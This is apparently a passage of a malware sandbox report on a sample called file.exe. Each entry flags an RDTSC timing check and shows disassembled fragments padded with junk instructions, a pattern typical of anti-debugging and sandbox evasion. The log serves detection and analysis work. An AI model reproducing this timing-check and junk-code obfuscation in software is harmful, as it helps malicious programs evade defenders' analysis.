            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC45C second address: 6CC460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC460 second address: 6CC47D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC814 second address: 6EC868 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F377CE47986h 0x00000009 pop edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F377CE47991h 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b jbe 00007F377CE47986h 0x00000021 jmp 00007F377CE47996h 0x00000026 popad 0x00000027 push esi 0x00000028 pushad 0x00000029 popad 0x0000002a pushad 0x0000002b popad 0x0000002c pop esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jo 00007F377CE47986h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC868 second address: 6EC86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B504E second address: 6B5053 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA6AD second address: 6EA6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA6B3 second address: 6EA6E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F377CE47996h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA6E1 second address: 6EA6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F377C5325E6h 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA829 second address: 6EA843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F377CE47995h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA978 second address: 6EA982 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA982 second address: 6EA987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA987 second address: 6EA9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325F9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA9AB second address: 6EA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAC72 second address: 6EAC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAC77 second address: 6EACA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47992h 0x00000009 jmp 00007F377CE47991h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EACA2 second address: 6EACCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F377C5325E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnl 00007F377C5325F7h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE4C second address: 6EAE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE50 second address: 6EAE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE54 second address: 6EAE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE5A second address: 6EAE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F377C5325F1h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAFBB second address: 6EAFC5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F377CE4798Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB2A5 second address: 6EB2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F377C5325E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB800 second address: 6EB80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007F377CE47986h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB80C second address: 6EB834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F2h 0x00000007 jmp 00007F377C5325ECh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB834 second address: 6EB838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E33DA second address: 6E33E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E33E0 second address: 6E33EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2B34 second address: 6C2B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2B38 second address: 6C2B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC25A second address: 6EC264 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F377C5325ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC392 second address: 6EC3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47992h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jg 00007F377CE47986h 0x00000011 jmp 00007F377CE47990h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC3C2 second address: 6EC3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jnc 00007F377C5325E6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE750 second address: 6EE754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE754 second address: 6EE758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE758 second address: 6EE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDD37 second address: 6EDD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDD3B second address: 6EDD41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEE06 second address: 6EEE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6C04 second address: 6B6C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F377CE47986h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6C11 second address: 6B6C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1031 second address: 6C1040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F377CE47986h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1040 second address: 6C1044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1044 second address: 6C104A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6E77 second address: 6F6E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6E7D second address: 6F6E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F377CE4798Bh 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F377CE47986h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F727D second address: 6F72B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F377C5325EAh 0x0000000e jmp 00007F377C5325F5h 0x00000013 pop esi 0x00000014 pushad 0x00000015 jmp 00007F377C5325EAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75AB second address: 6F75B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75B3 second address: 6F75BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F377C5325E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75BF second address: 6F75C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75C3 second address: 6F75C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F76ED second address: 6F76F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F76F3 second address: 6F76F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F76F7 second address: 6F7718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47991h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F377CE4798Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F7824 second address: 6F783D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F377C5325E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAFB2 second address: 6FAFDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F377CE47991h 0x0000000f jmp 00007F377CE4798Bh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAFDD second address: 6FAFF5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAFF5 second address: 6FAFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB4B4 second address: 6FB4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB62 second address: 6FBB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB66 second address: 6FBB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB6C second address: 6FBB72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB72 second address: 6FBB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB76 second address: 6FBBC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F377CE47988h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push eax 0x00000026 or dword ptr [ebp+122D1D16h], edx 0x0000002c pop esi 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F377CE47994h 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBBC6 second address: 6FBBD0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBBD0 second address: 6FBBFF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F377CE4798Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F377CE47999h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBCFB second address: 6FBD00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1D4 second address: 6FC1E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1E4 second address: 6FC1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1EB second address: 6FC1F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1F1 second address: 6FC233 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F377C5325E8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call 00007F377C5325EBh 0x0000002c pop esi 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC233 second address: 6FC237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC237 second address: 6FC252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD10E second address: 6FD124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47992h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE266 second address: 6FE282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F377C5325F3h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD8AE second address: 6FD8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD8B4 second address: 6FD8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70015F second address: 700172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F377CE47988h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700172 second address: 7001AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F377C5325ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jbe 00007F377C5325ECh 0x00000011 mov dword ptr [ebp+122D2FF9h], edx 0x00000017 push 00000000h 0x00000019 xor dword ptr [ebp+12489FC6h], eax 0x0000001f push 00000000h 0x00000021 mov esi, 3D9AEF4Ch 0x00000026 push eax 0x00000027 push ecx 0x00000028 pushad 0x00000029 jmp 00007F377C5325EAh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFEF9 second address: 6FFF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F377CE47986h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF04 second address: 6FFF1B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F377C5325ECh 0x00000008 jns 00007F377C5325E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF1B second address: 6FFF25 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF25 second address: 6FFF2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F377C5325E6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF595 second address: 6BF599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF599 second address: 6BF5AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F377C5325ECh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF5AD second address: 6BF5B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705306 second address: 70530A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B01 second address: 706B06 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B06 second address: 706B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx ebx, ax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 sub di, 0BC9h 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 or dword ptr [ebp+122D2DB1h], eax 0x00000026 mov eax, dword ptr [ebp+122D1535h] 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F377C5325E8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 js 00007F377C5325E9h 0x0000004c xor bl, 0000004Fh 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007F377C5325E8h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 00000014h 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jnl 00007F377C5325E6h 0x00000076 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B83 second address: 706B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708945 second address: 70894B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707AF6 second address: 707AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707AFC second address: 707B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708B0C second address: 708B2A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F377CE47988h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F377CE4798Fh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708BCD second address: 708BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
